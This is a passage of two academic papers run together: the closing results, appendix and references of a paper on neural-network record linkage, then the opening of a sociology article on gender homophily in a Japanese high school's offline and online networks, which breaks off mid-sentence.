10.7717/peerj-cs.258 11/20 https://peerj.com https://doi.org/10.7717/peerjcs.258/fig-6 http://dx.doi.org/10.7717/peerj-cs.258 Figure 7 Results for multiple criteria similarity with threshold θ = 0.63, unweighted. (A) Precision; (B) recall. Full-size DOI: 10.7717/peerjcs.258/fig-7 Weighted multiple criteria threshold In this test, the previous results were improved by varying the importance of the various fields through an appropriate weighing. The weights, for each attribute, were automatically determined based on their distinct values distribution, and normalized in such a way that their sum is equal to 1.0 (see Fig. A4). Among the various possibilities of normalization (linear, max, quadratic, exp ...) that logarithmic seems to give the best results for both overall precision and recall maintaining low variance (see Fig. A4). • Comparing : each attribute is compared using the following metrics: (a) Jaro–Winkler, (b) Levenshtein, (c) Cosine, (d) Jaccard, (e) Siresen-Dice, (f) Bigrams, (g) Trigrams, (h) Exact. • Classifying : binary threshold with θ =0.63 as optimal value applied to the weighted sum of the similarity vector. • Weighting : the weights of the various attributes are estimated according to the distribution of their distinct values and normalized using a logarithmic function. The associated weight is directly proportional to the number of distinct values over the totals. Figure 8 shows the results of the 21 executions: the average precision is 89,37% and the average recall is 94,74%, with low variability. MLP based classification To allow a fair comparison, the tests using MLP classifier have followed the same schema of the the previous ones. Maratea et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.258 12/20 https://peerj.com https://doi.org/10.7717/peerjcs.258/fig-7 http://dx.doi.org/10.7717/peerj-cs.258 Figure 8 Results for multiple criteria similarity with threshold θ = 0.63, weighted. (A) Precision; (B) recall. Full-size DOI: 10.7717/peerjcs.258/fig-8 Figure 9 Results of the Levenshtein test with MLP classifier. (A) Precision; (B) recall. Full-size DOI: 10.7717/peerjcs.258/fig-9 MLP Levenshtein In this test, only the normalized Levenshtein distance was used, likewise the homonym test with the threshold classifier. As can be seen, the results clearly outperform all previous ones. • Comparing : Levenshtein normalized distance only. • Classifying : MLP based classifier. Figure 9 shows the results of the 21 executions: the average precision is 95,04% and the average recall is 97,71%, with very low variability. MLP with multiple criteria In this test, multiple comparison criteria for each attributes have been used, likewise the homonym test with the threshold classifier. The results are almost perfect, especially for recall. In addition, the high precision allowed the manual control of the ‘‘false-positive’’ pairs, many of which are actually correct, but due to errors have a different fiscal code in the gold standard (see Data sources). Considering these fixes, precision reaches 100% in some cases. • Comparing : Each attribute is compared using the following comparators: (a) Jaro–Winkler, Maratea et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.258 13/20 https://peerj.com https://doi.org/10.7717/peerjcs.258/fig-8 https://doi.org/10.7717/peerjcs.258/fig-9 http://dx.doi.org/10.7717/peerj-cs.258 Figure 10 Results of test #2 for MLP classification. (A) Precision; (B) recall. Full-size DOI: 10.7717/peerjcs.258/fig-10 Table 3 Experimental results Summary: summarized results obtained through the mean values and standard deviation of the 21 executions for each test. Classifier Comparators %Precision %Recall Threshold Levenshtein 69,63%±17,76% 70,04%±16,66% Threshold All 71,93%±17,51% 85,85%±11,61% Weighted Threshold All 89,37%± 4,98% 94,74%± 6,12% Multilayer Perceptron Levenshtein 95,04%± 2,28% 97,71%± 1,78% Multilayer Perceptron All 97,58%± 0,99% 99,39%± 0,55% (b) Levenshtein, (c) Cosine, (d) Jaccard, (e) Siresen-Dice, (f) Bigrams, (g) Trigrams, (h) Exact. • Classifying : MLP based classifier. Figure 10 shows the results of the 21 executions: the average precision is 97,58% and the average recall is 99,39%, with very low variability. Summary results In Table 3, a comprehensive view of the obtained results through the mean values and standard deviation of the 21 executions is reported. CONCLUSIONS First the various stages of the classic Record Linkage (RL) process have been presented, then a classifier based on multiple criteria and Neural Networks has been proposed in the classification stage of RL. Specifically, the chaining of different similarity measures on different fields has been used as feature vector for the subsequent classification of record pairs based on Multi-Layer Perceptron (MLP). The proposed feature vector plus MLP classifier has been tested on several real-world datasets belonging to geographically close Maratea et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.258 14/20 https://peerj.com https://doi.org/10.7717/peerjcs.258/fig-10 http://dx.doi.org/10.7717/peerj-cs.258 Figure A1 Levenshtein threshold. (A) The precision–recall curve generated on the training-set in experi- ment #1; The optimal threshold is tr =0.7. (B) The F1-score when the threshold changes. Full-size DOI: 10.7717/peerjcs.258/fig-11 banks and municipalities, scoring remarkably (please see Table 3) and clearly outperforming the threshold-based methods. Neural Networks, even with a shallow architecture and few nodes, proved to be effective classifiers and should be seriously considered for RL when even a modest amount of labeled data is available. ACKNOWLEDGEMENTS The authors thank SADAS s.r.l. (https://www.sadasdb.com/en/) for providing the necessary data and making their columnar database, proprietary technologies and research laboratories available. APPENDIX Precision recall curve In this section are shown in Figs. A1–A3, for each threshold-based test, the precision–recall curve generated on the training-set database pair (A, B). These curves were used to determine the optimal threshold value for classifiers. Weight vector estimation In this section, the methodology used in experiment 3 for the weights estimation is described. The weight vector has as many components as there are attributes selected for the RL each of which is calculated as: wi= log‖suppai‖ log‖ai‖ · log‖suppbi‖ log‖bi‖ (1) where ai and bi are the multi-set values of the corresponding i-th attribute of the first and second table respectively. The notation supp· indicate the support, i.e., the set of unique items in multi-set and ‖·‖ denotes the cardinality. Maratea et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.258 15/20 https://peerj.com https://doi.org/10.7717/peerjcs.258/fig-11 https://www.sadasdb.com/en/ http://dx.doi.org/10.7717/peerj-cs.258 Figure A2 Multiple criteria threshold. (A) The precision–recall curve generated on the training-set in experiment #2; the optimal threshold is tr =0.63. (B) The F1-score when the threshold changes. Full-size DOI: 10.7717/peerjcs.258/fig-12 Figure A3 Weighted multiple criteria threshold. (A) The precision–recall curve generated on the training-set in experiment #3; the optimal threshold is tr = 0.56. (B) The F1-score when the threshold changes. Full-size DOI: 10.7717/peerjcs.258/fig-13 This measure takes into account both the number of distinct values and the size difference of the two tables. Weight vector normalization In this section are shown, the vector normalization technique and then, for each normalization base function, in Fig. A4, the precision–recall curve generated on the training-set database pair (A,B). These curves were used to select the best type of normalization. Maratea et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.258 16/20 https://peerj.com https://doi.org/10.7717/peerjcs.258/fig-12 https://doi.org/10.7717/peerjcs.258/fig-13 http://dx.doi.org/10.7717/peerj-cs.258 Figure A4 (A) The precision–recall curves generated on the training-set in experiment #3 for each of the normalization techniques; (B) a zoomed view of the same curves. The relative winner, in terms of precision and recall, was the quadratic normalization, but results of higher quality and lower variance were obtained using a logarithmic function. Full-size DOI: 10.7717/peerjcs.258/fig-14 Normalization To alter the contribution of the various attributes during the classification while maintaining unchanged the weighted sum of the components of the similarity vector, a normalization of the weight vector is necessary. Given a weight vector w=(w1,w2,...,wn) and same base function f a normalized vector ŵ=(ŵ1,ŵ2,...,ŵn) can be obtained simply by applying element-wise the equation: ŵi= f (wi)∑n j=1f (wj) (2) i.e., applying the function f to each element of the input vector wi and normalizing these values by dividing by the sum of all these values; this normalization ensures that the sum of the components of the output vector ŵ is 1. The tested base function f are listed below: linear: f (x)=x quadratic: f (x)=x2 cubic: f (x)=x3 logaritmic: f (x)= log(1+x) softmax: f (x)=ex inverse: f (x)=x−1 Precision–recall curves Results for both overall precision and recall among the various possibilities of normalization: linear, max, quadratic, exp ... logarithmic. Maratea et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.258 17/20 https://peerj.com https://doi.org/10.7717/peerjcs.258/fig-14 http://dx.doi.org/10.7717/peerj-cs.258 ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Antonio Maratea conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • Angelo Ciaramella analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • Giuseppe Pio Cianci performed the experiments, authored or reviewed drafts of the paper, performed the computation work, prepared figures and/or tables, and approved the final draft. Data Availability The following information was supplied regarding data availability: The data, code, and a readme file are available in the Supplementary Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.258#supplemental-information. REFERENCES Aiken VCF, Dórea JRR, Acedo JS, De Sousa FG, Dias FG, De Magalhães Rosa GJ. 2019. Record linkage for farm-level data analytics: comparison of deterministic, stochastic and machine learning methods. Computers and Electronics in Agriculture 163:104857 DOI 10.1016/j.compag.2019.104857. Batini C, Scannapieco M. 2006. Data quality: concepts, methodologies and techniques. Berlin: Springer. Batista GEAPA, Bazzan ALC, Monard MC. 2003. Balancing training data for automated annotation of keywords: a case study. Batista GEAPA, Prati RC, Monard MC. 2004. A study of the behavior of several methods for balancing machine learning training data. ACM SIGKDD Explorations Newsletter 6(1):20–29 DOI 10.1145/1007730.1007735. Bowyer KW, Chawla NV, Hall LO, Kegelmeyer WP. 2011. SMOTE: synthetic minority over-sampling technique. Journal of Artificial Intelligence Research 16:321–357 DOI 10.1613/jair.953. Brizan DG, Tansel AU. 2006. A. survey of entity resolution and record linkage method- ologies. Communications of the IIMA 6(3):5. Maratea et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.258 18/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.258#supplemental-information http://dx.doi.org/10.7717/peerj-cs.258#supplemental-information http://dx.doi.org/10.7717/peerj-cs.258#supplemental-information http://dx.doi.org/10.1016/j.compag.2019.104857 http://dx.doi.org/10.1145/1007730.1007735 http://dx.doi.org/10.1613/jair.953 http://dx.doi.org/10.7717/peerj-cs.258 Christen P. 2011. A survey of indexing techniques for scalable record linkage and dedu- plication. IEEE Transactions on Knowledge and Data Engineering 24(9):1537–1555. Christen P. 2012. Data matching: concepts and techniques for record linkage, entity resolution, and duplicate detection. Berlin, Heidelberg: Springer-Verlag. Christen P, Goiser K. 2007. Quality and complexity measures for data linkage and dedu- plication. In: Quality measures in data mining. Studies in computational intelligence, Berlin, Heidelberg: Springer-Verlag, 127–151. Di Cicco V, Firmani D, Koudas N, Merialdo P, Srivastava D. 2019. Interpreting deep learning models for entity resolution: an experience report using LIME. In: Proceedings of the second international workshop on exploiting artificial intel- ligence techniques for data management, aiDM ’19. New York: ACM, 8:1–8:4 DOI 10.1145/3329859.3329878. Dong XL, Rekatsinas T. 2018. Data integration and machine learning: a natural synergy. In: Proceedings of the 2018 international conference on management of data. New York: ACM, 1645–1650. Ebraheem M, Thirumuruganathan S, Joty SR, Ouzzani M, Tang N. 2018. Distributed representations of tuples for entity resolution. PVLDB 11:1454–1467. Gottapu RD, Dagli C, Ali B. 2016. Entity resolution using convolutional neural network. Procedia Computer Science 95:153–158 DOI 10.1016/j.procs.2016.09.306. Harron K, Dibben C, Boyd J, Hjern A, Azimaee M, Barreto ML, Goldstein H. 2017. Challenges in administrative data linkage for research. Big Data & Society 4(2):2053951717745678. He H, Bai Y, Garcia EA, Li S. 2008. ADASYN: adaptive synthetic sampling approach for imbalanced learning. In: IEEE international joint conference on neural networks (IEEE world congress on computational intelligence), IJCNN 2008. 1322–1328. Hou B, Chen Q, Shen J, Liu X, Zhong P, Wang Y, Chen Z, Li Z. 2019. Gradual machine learning for entity resolution. In: The world wide web conference, WWW ’19. New York: ACM, 3526–3530 DOI 10.1145/3308558.3314121. Kasai J, Qian K, Gurajada S, Li Y, Popa L. 2019. Low-resource deep entity resolution with transfer and active learning. CoRR abs/1906.08042. Kooli N, Allesiardo R, Pigneul E. 2018. Deep learning based approach for entity resolution in databases. In: Intelligent information and database systems. Cham: Springer International Publishing, 3–12. Levenshtein VI. 1966. Binary codes capable of correcting deletions, insertions and reversals. Soviet Physics Doklady 10(8):707–710. Doklady Akademii Nauk SSSR, V163 No4 845-848 1965. Maratea A, Ferone A. 2018. Deep neural networks and explainable machine learn- ing. In: Fuzzy logic and applications—12th international workshop, WILF 2018, Genoa, Italy, September 6–7, 2018, Revised Selected Papers. 253–256 DOI 10.1007/978-3-030-12544-8_23. Mudgal S, Li H, Rekatsinas T, Doan A, Park Y, Krishnan G, Deep R, Arcaute E, Raghavendra V. 2018. Deep learning for entity matching: a design space exploration. Maratea et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.258 19/20 https://peerj.com http://dx.doi.org/10.1145/3329859.3329878 http://dx.doi.org/10.1016/j.procs.2016.09.306 http://dx.doi.org/10.1145/3308558.3314121 http://dx.doi.org/10.1007/978-3-030-12544-8_23 http://dx.doi.org/10.7717/peerj-cs.258 In: Proceedings of the 2018 international conference on management of data, SIGMOD ’18. New York: ACM, 19–34 DOI 10.1145/3183713.3196926. Navarro G. 2001. A guided tour to approximate string matching. ACM Computing Surveys 33(1):31–88 DOI 10.1145/375360.375365. Siegert Y, Jiang X, Krieg V, Bartholomäus S. 2016. Classification-based record linkage with pseudonymized data for epidemiological cancer registries. IEEE Transactions on Multimedia 18(10):1929–1941 DOI 10.1109/TMM.2016.2598482. Subitha S, Punitha SC. 2014. An effective method for matching patient records from multiple databases using neural network. International Journal of Computer Appli- cations 104(12):17–21. Vatsalan D, Christen P, Verykios VS. 2013. A taxonomy of privacy-preserving record linkage techniques. Information Systems 38(6):946–969 DOI 10.1016/j.is.2012.11.005. Wilson DR. 2011. Beyond probabilistic record linkage: using neural networks and complex features to improve genealogical record linkage. In: The 2011 international joint conference on neural networks. 9–14 DOI 10.1109/IJCNN.2011.6033192. Zhang LQ. 2011. Record linkage methodology and applications. In: Handbook of data intensive computing. New York: Springer New York, 377–413. Zhao H, Ram S. 2005. Entity identification for heterogeneous database integration—a multiple classifier system approach and empirical evaluation. Information Systems 30(2):119–132 DOI 10.1016/j.is.2003.11.001. Maratea et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.258 20/20 https://peerj.com http://dx.doi.org/10.1145/3183713.3196926 http://dx.doi.org/10.1145/375360.375365 http://dx.doi.org/10.1109/TMM.2016.2598482 http://dx.doi.org/10.1016/j.is.2012.11.005 http://dx.doi.org/10.1109/IJCNN.2011.6033192 http://dx.doi.org/10.1016/j.is.2003.11.001 http://dx.doi.org/10.7717/peerj-cs.258 work_hx46653twfhv5mfqggtxamgkbe ---- 77© 2020 Authors. This work is licensed under the Creative Commons Attribution 4.0 License (https://creativecommons.org/licenses/by/4.0/) CONNECTIONS Issue 1 | Vol. 40Article | DOI: 10.21307/connections-2019.014 Comparing Gender Homophily among the Multilayer Media Social Networks of Face-to-Face, Instant Messenger and Social Networking Services: A Case Study of a High School Classroom Naoki Maejima The University of Tokyo, Graduate School of Humanities and Sociology, Tokyo, Japan. E-mail: malimo1024@gmail.com Received for publication January 17, 2020. Abstract In which social worlds does gender homophily operate more strongly – offline or online? To address this question, the following two aspects must be considered. First, people currently use many types of online communication media. Second, to examine the homophily effects exclusively, it is necessary to control for other network formation mechanisms such as ‘foci’ and ‘triadic closure.’ For this study, I conducted a mixed-method research in a high school in rural Japan. I asked students about who they interacted with face-to-face (F2F), through instant messenger (IM), and social networking services (SNS) and then analyzed the social networks using exponential random graph models (ERGMs). Subsequently, I conducted semi-structured interviews to uncover the practices and social contexts of each communication media and explain the results of the quantitative analysis. The results showed that SNS was more gender heterogeneous than offline. In the IM network, a small gender homophily effect was initially observed. However, three months later, its strength decreased to almost the same as that in the SNS networks. From the qualitative research, some key mechanisms producing the difference in gender homophily are specified, such as precedence of F2F communication to IM interaction, independence of SNS communication from F2F, recommending functions, and hobby homophily. Overall, this study implies that considering offline or online alone may cause misunderstanding regarding homophily in organizations because the observed strength of homophily effects depends on whether the space is examined offline or online, what kind of media is examined, and when the online social network data are collected. Keywords Homophily, Social media, Multilayer networks, Exponential random graph models. Homophily is defined as ‘the principle that contact between similar people occurs at a higher rate than among dissimilar people’ (McPherson et al., 2001, p. 416). This principle is universally observed in a wide variety of social networks. Currently, social interactions occur in both offline and online spaces. This raises an important question: Are there differences in homophily between offline and online spaces within a single social group? Although many preceding studies have examined homophily in both offline and online spaces, few studies have examined the differences in homophily between these spaces in small social groups such as classroom and workplace. After the emergence 78 Gender Homophily in Multilayer Media Social Networks of social networking services (SNSs) such as Twitter and Facebook, social connections offline and online have become more dependent, continuous, and multiplexed (Boyd and Ellison, 2007; Ellison et al., 2007). It becomes increasingly difficult to understand our social networks researching offline or online alone. If there is a difference in the strength of homophily between offline and online social networks, studies regarding homophily that examine only the offline or online environment will fail to depict the strength of homophily in a social group. In this study, I aim to reveal the differences in gender homophily among communication media through a case study of a high school classroom. To address the ‘offline vs. online’ question in a modern setting, it is necessary to consider that nowadays people use multiple online media tools such as instant messenger (IM) and SNSs. The present study distinguishes between online communication in IM and SNSs and compares the homophily mecha- nisms in each network with the face-to-face (F2F) network. Although they are created before the emergence and development of SNSs, some computer-mediated communication (CMC) theories predict that online communication filters ‘social cues’ and alleviates the social norms that constrain social interactions. Moreover, it can be assumed that online spaces generate a unique social identity between individuals who share the same offline membership, such as a classroom or workplace. In online spaces, people are less constrained by social norms than offline spaces when they interact with each other, and they foster a feeling of similarity if they belong to the same social group, which would promote social interaction among them regardless of social attributes such as gender. Therefore, I argue that online social networks are more heterophilic than offline social networks. Furthermore, I also expect that there is a difference in the strength of gender homophily between online media, and I hypothesize that the SNS network layer is more heterophilic than the IM network layer. SNSs such as Facebook are often used for maintaining offline friendship (Ellison et al., 2007) and offer messaging functions like IM. However, SNSs form ‘networked publics’ (Boyd, 2008), which contain many other unknown users on the same platform and offer them access to the users’ contents through networked technology such as searching, sharing, or retweeting. In such a situation, compared to IM, individuals find and meet their friends with a common offline membership, which can foster a stronger group identity among them. In this study, homophily is regarded as individuals’ preference to form social ties with others who have similar social attributes. It is necessary to distinguish homophily as a process of tie formation in the network and a joint outcome of various mechanisms including ‘foci’ or ‘triadic closure’ which can also induce network homogeneity (Wimmer and Lewis, 2010). The foci mechanism suggests that common activities such as club activities are essential for tie formation across communication media. The triadic closure mechanism proposes that friends of friends are likely to be friends. To distinguish the strength of homophily from these other network formation mechanisms, the present study applies exponential random graph models (ERGMs) to media multilayer social networks. Finally, in addition to quantitatively testing hypo- theses, through qualitative research, this study also tries to identify some social practices and mechanisms that produce differences in homophily in each network layer. Homophily in offline and online social networks Homophily in offline social networks In offline spaces such as high school classrooms, social segregation by gender, age, race/ethnicity, and extra-curricular activities is often observed (Kandel, 1978; Shrum et al., 1988; Moody, 2001; Mouw and Entwisle, 2006; Goodreau et al., 2009; Wimmer and Lewis, 2010; Leszczensky and Pink, 2015). For example, Shrum et al. (1988), from a large-scale study of 2,135 schoolchildren, grades 3 to 12 in the Southern United States, revealed that for the third grade, about two-thirds of the expected counts of cross-race ties were not observed, and for the sixth grade, 90% of the expected counts of cross-gender ties were missing. Social segregation in an organization is a result of complex network formation mechanisms. It has been noted that segregation is caused not only by the preference to form social ties with who have similar social attributes to them, foci (i.e., involving the same community or activity induces tie formation) and triadic closure (i.e., friends of friends tend to be friends) affect segregation (Goodreau et al., 2009; Wimmer and Lewis, 2010). Without considering these features, homophily effects could be overestimated. Homophily in online social networks At the same time, there is a large number of studies on homophily on online media. Here, ‘online media’ 79 CONNECTIONS refers to a wide range of digital communication tools on the Internet, such as e-mail, newsgroups, instant messengers, Myspace, Facebook, Twitter, and so on. Recently, it has been pointed out that SNSs tend to connect homogeneous actors and cause ‘echo chamber’ problems (Colleoni et al., 2014). For example, Conover et al. (2011) reveal that, by analyzing over 250,000 tweets during the 2010 U.S. congressional midterm elections on Twitter, retweets networks containing political messages are highly segregated, where left- and right-leaning users are sparsely connected with each other. However, some studies suggest that online media alleviate social segregation. In the early stages of the Internet, the online world was proposed to be a ‘virtual community’ (Rheingold, 1993) – an independent, free, and progressive utopia (Barlow, 1996). Therefore, research on online social networks emphasizes the liberty and diversity of the online world (Parks and Floyd, 1996; Kendall, 2002). Parks and Floyd (1996) researched users of ‘Usenet,’ one of the oldest and most popular computer networks before the spread of the World Wide Web and hosted wide-ranging newsgroups. They found that about two-thirds of users made personal connections with people they first met on the newsgroup. Parks and Roberts (1998) claimed that, on a MOO (a text-based virtual space), 83.6% of social relations were cross- gender ties. In a more modern setting, another study analyzed friends’ communication in Myspace, one of the earliest SNSs, and found no gender homophily effects (Thelwall, 2009). In another example, Laniado et al. (2016) analyzed the case of ‘Tuenti,’ a Spanish SNS, mainly focusing on homophily differences between men and women, and found that gender homophily was stronger among women than men, and the rates of same-sex friends of both genders were lower than those of offline studies. Multilayer media social networks However, these previous studies considered only one layer of social networks. This is problematic given the modern media environment. Since the emergence of SNSs such as Twitter and Facebook, social connections offline and online have become more dependent, continuous, and multiplexed (Boyd and Ellison, 2007; Ellison et al., 2007). In a web survey of undergraduate students (N = 286), Ellison et al. (2007) found that Facebook was used to contact old friends and maintain social connections that originated at offline parties or with classmates. In this manner, the Internet changed from a place for strangers to meet to a tool for already acquainted people to become friends. Since individuals today not only interact with others face-to-face but also through various communication media, such as IM or SNSs, social ties with others are created on diverse media simultaneously. Therefore, the whole social network should be treated as a multilayer media network (Haythornthwaite, 2001, 2005; Kivelä et al., 2014). It becomes increasingly difficult to understand our social networks researching offline or online alone. If this aspect of modern communication is not considered, research on social networks would draw the wrong image about homophily. A few studies have examined such multilayer media networks. For example, Igarashi et al. (2005, 2013) studied F2F interactions and mobile phone text messaging (MPTM), including both e-mail and short message service (SMS), obtained from a survey of first-year undergraduate students. Specifically, they investigated the whole network of each layer and quantified gender homophily as the network formation principle in each layer. Baym and Ledbetter (2009), from a survey of users of a music-sharing website called ‘Last.fm’, found that connections on the platform were more likely to be cross-gender compared to connections face-to-face or through phone calls and other websites. In another example, Hristova et al. (2014) compared the network structure between Facebook and offline social networks to assess the heterophily of political opinions and homogeneity of school year in online networks. However, these studies examined only a small part of the multilayer media or did not consider structural effects such as foci or triadic closure. To address the ‘offline vs. online’ question in terms of homophily, we must consider two factors. First, people use various types of communication media. Although Hristova et al. (2014) regarded Facebook as ‘online’ media, this category intrinsically includes diverse electronic communication media. Moreover, it is a misleading categorization when the homophily effect of various communication media is also not evaluated concurrently. Second, to evaluate the effect of homophily exclusively, it is necessary to control other network formation mechanisms such as foci (Feld, 1981) and triadic closure (Goodreau et al., 2009; Wimmer and Lewis, 2010). There is a huge difference between ‘homophily’ and ‘network autocorrelation’ (Feld and Grofman, 2009). ‘Homophily’ is an expression of personal preferences, while ‘network autocorrelation’ is the trend of ‘linking among similar,’ which is caused by various mechanisms such as belonging to the same homogeneous community. 80 Gender Homophily in Multilayer Media Social Networks Gender homophily The current research specifically focuses on gender homophily. In a review study, Mehta and Strough (2009) claimed that gender homophily exists across the entire lifespan. In an offline situation, Stehlé et al. (2013) examined gender homophily among primary school students based on network data measured in a primary school in France over two days, using wearable devices that recorded proximity among students. As a result, gender homophily was ob- served in every grade. Gender segregation, which is caused by gen- der homophily, produces various outcomes for in- dividuals and networks. Kalmijn (2002) claimed that gender segregation affects outcomes in at least three ways. First, gender segregation is important because it creates gender stereotypes and strengthens traditional gender roles. Second, it prevents people from understanding each gender and makes romantic relationships more complex. Third, interactions of both genders enhance the social capital of women. Based on fieldwork in a high school classroom in Japan, the present study examines differences in the degree of gender homophily among various social network layers of communication media, considering, as mentioned above, network mechanisms such as foci and triadic closure. Theory and hypothesis From several theories in computer-mediated commu- nication (CMC) studies, it can be predicted that the effect of gender homophily on a social network operates more weakly in an online world. Note that the theories were made in the pre-SNS period, when only text-based messaging media such as e-mail were available, and people communicated with anonymous others through these media. Although in the post-SNS period, people often use online media to maintain the relationship between friends who have already known each other, the theories still provide deep insight into homophily in offline and online social spaces. According to ‘reduced social cues theory,’ electronic media reduces social cues to infer the social contexts of others, including geographic lo- cation, affiliation, status, job, age, and gender. These media attenuate social cues available in face-to- face interaction, including non-verbal cues such as gestures, tone of voices, and facial expression to recognize social contexts (Sproull and Kiesler, 1986). Since the lack of these non-verbal cues causes social anonymity, the effects of norms and standards of social groups on behavior are attenuated, facilitating anti-normative behaviors (Kiesler et al., 1984). Note that in the modern media environment, where people use online media to maintain the relationship between friends they already know, people know the social attributes of each other, and they are not perfectly anonymous because they experience meeting offline. However, when they interact in the IM and SNSs, only a few non-verbal cues are available, which may lead to anti-normative behavior. For instance, when considering students in a classroom, the lack of cues in the online spaces, such as upset facial expressions of girls when a boy speaks to them and the gaze from others may facilitate inter-gender communication. Reduced social cues theorists often think the relationships through CMC as they are impersonal and not useful for cultivating relationships, compared to face-to-face communication. Although empirical studies based on reduced social cues theory focused on ‘flaming’, i.e. aggressive and hostile verbal behavior (Kiesler et al., 1984), subsequent studies revealed that CMC can promote positive relationships as well as face-to-face communication through mechanisms such as long-term message exchange complementing the scarcity of social cues and selectively disclosing themselves (Walther, 1992, 1996). However, the perspective that technological features of online media weaken social norms regulating communication between people is insightful and informative to study homophily in the offline and online spaces in that they offer possibilities for network formation otherwise regulated by the norm in the offline space. Taken together, this theory predicts that online communication media lead social networks toward lower levels of gender homophily. As it has long been widely known, cross-gender friendship is constrained by social norms (Booth and Hess, 1974). Since the media reduces social cues and weakens the social norms that constrain social interactions in offline spaces, gender homophily is weaker in the online world. Furthermore, in social spaces where people use multiple media and their connections overlap across various media, it is expected that offline membership will be similar to online encounters. The formation of online ties not biased by social attributes can be accounted for by ‘group identity’ because communication media enables users to communicate and produces a distinct identity. According to Meyrowitz (1986), whether one associates with the same group identity as others depends on the 81 CONNECTIONS specific situation. Meyrowitz offers the following example: “Any common experience, information, or role that separates two or more people from others will give them a sense of common identity. Yet because social experience, information, and roles are situation-bound, group identities will change with variations in situations or with a shift in participants’ perspectives concerning “insiders” and “outsiders.” Two New Yorkers who meet in Georgia may feel an immediate bond that unites them “against” Georgians. At the same time, however, a Georgian and a New Yorker who meet in Italy may feel a similar connection with each other because they are both American.” (Meyrowitz, 1986, p. 54) As in this example, when students meet in the classroom (i.e., offline space), they take their setting for granted. However, if they meet online, they may feel ‘an immediate bond’ because they have the same group identity as classmates, which would promote interaction among them. Thus, if individuals in the same social group encounter one another in an online space, social cues are reduced, and perceptions of similarity grow. This generates social ties among individuals, regardless of their social attributes. In other words, offline spaces themselves become ‘foci’ (Feld, 1981) that densely connect people in online spaces. This can be specific to the modern multiplex- media situation. In addition, the difference in gender homophily among online media can be supposed. In particular, SNSs such as Myspace and Facebook have an aspect of ‘networked publics,’ which have the following three dynamics: ‘invisible audiences,’ ‘collapsed contexts,’ and ‘the blurring of public and private’ (Boyd, 2008). As previously mentioned, most SNSs such as Facebook use them to connect and maintain friendships with people whom they have already met offline. However, users can deliver or receive content from distant individuals through the network, and user profiles can be searched by other users. These distant audiences are invisible, but users are clearly conscious of their existence. Teenage users of SNSs even attempt to prevent others from searching for them (Boyd, 2008). Therefore, SNSs offer more opportunities to find and recognize many strangers who do not share offline membership and foster group identity online more strongly than IM. Moreover, the functionality of SNSs can make gender homophily on SNSs weaker than IM. SNSs often implement recommendation functions, which helps users to find other users who are likely to match them. This function promotes them to find and identify users who have the same offline membership because profiles that users input by themselves give clues to who an account is. Furthermore, information on profiles may bring unexpected findings of similarity such as hobby or tastes, which promotes tie formation based on cultural matching, canceling out the gender homophily. Based on this, regarding the ‘online vs. offline’ problem, I formed a two-part hypothesis concerning multiple online communication media: Hypothesis 1a: in the SNS social network layer, gender homophily operates more weakly than in the offline social network layer, and Hypothesis 1b: in the IM social network layer, gender homophily operates more weakly than in the offline social network layer. Likewise, regarding the difference in gender homophily among online media, I hypothesized that in the SNS social network layers, gender homophily operates more weakly than in the IM social network layers (Hypothesis 2). To examine the two hypotheses, I evaluate the degree of homophily in each layer, comparing gender homophily in face-to-face versus online networks. Data and methods In this study, I adopted a mixed-method framework that integrates qualitative and quantitative research methods. I analyzed the network structure of the observed social network using quantitative sta- tistical approaches. In addition, I captured the practices, meanings, processes, and other social contexts through a qualitative approach to interpret the statistical analysis. The research design of this study was a sequential explanatory design, which begins with quantitative data collection and analysis, followed by qualitative research to elaborate on the results of the quantitative analysis (Teddlie and Tashakkori, 2006; Domínguez and Hollstein, 2014). The results of the qualitative research were used to explain the results of the quantitative research, such as the differences in gender homophily effects between network layers. A series of surveys were conducted in a high school classroom in the rural region of Chūbu, Japan. The city’s central station can be reached by a super express train (also known as shinkansen) from Tokyo. This city is one of the snowiest areas in Japan, and skiing and snowboarding are popular in winter. The high school is located at the foot of the mountains. Most students travel a great distance by train to reach the central station and then take buses, bicycles, etc., to the high school. There were approximately 600 students in this school. The school is more academically advanced than many other schools in the prefecture, and most of the students go on to 82 Gender Homophily in Multilayer Media Social Networks university. In the third grade, the students were busy studying for entrance examinations. The survey was conducted in a classroom with second-grade students. In Japan, the second grade in high school is equivalent to the 11th grade in a US high school and year 12 in a UK secondary school. The students’ ages were primarily 16 or 17, with some exceptions (e.g., there were older students who had initially failed their high school entrance examinations.) Quantitative research Before conducting the research, I interviewed the class teacher in detail about the classroom. Students rarely use e-mail but mainly use LINE to contact other students, and they have a group chat that almost all students in the classroom join. LINE is the most popular instant messaging application in Japan. It can be seen as a representation of the various messaging apps because it has typical functions such as sending messages, creating group chat rooms, sharing pictures and videos, and using stickers and emoji, much like messaging apps popular in other countries, such as WhatsApp, Facebook Messenger, and Viber. As for SNS usage, when classroom allocation was rearranged (when students advance from first to second grade in April, the classroom allocation is rearranged), some students advertised their usernames on Twitter so that other students could follow their accounts. Based on this information, I conducted a que- stionnaire survey on June 15 (Wave 1) and September 21, 2016 (Wave 2). Although this study’s scope is a cross-sectional status of homophily, I analyzed both waves. At this school, the class change took place in April for the second-grade students. By studying the results from the two waves, it was possible to determine whether there was a difference between the early stages of friendship formation within the class and three months later. Conducting the research in two waves also verified the robustness of the results. The questionnaire consisted of three sections. The first section contained questions about the social attributes of students (e.g., ‘what is your gender?’), the second section contained questions about the media usage of students (e.g. ‘which messaging app do you install?’), and the third section contained questions about social networks among students (e.g. ‘who do you talk with?’). In the first section, I asked students about their gender, club activity, and academic courses. Second, I asked if they had a mobile phone or not, which SNSs they use, and how many times they have used SNSs. Finally, I asked with whom they talk in the classroom, with whom they communicate through instant 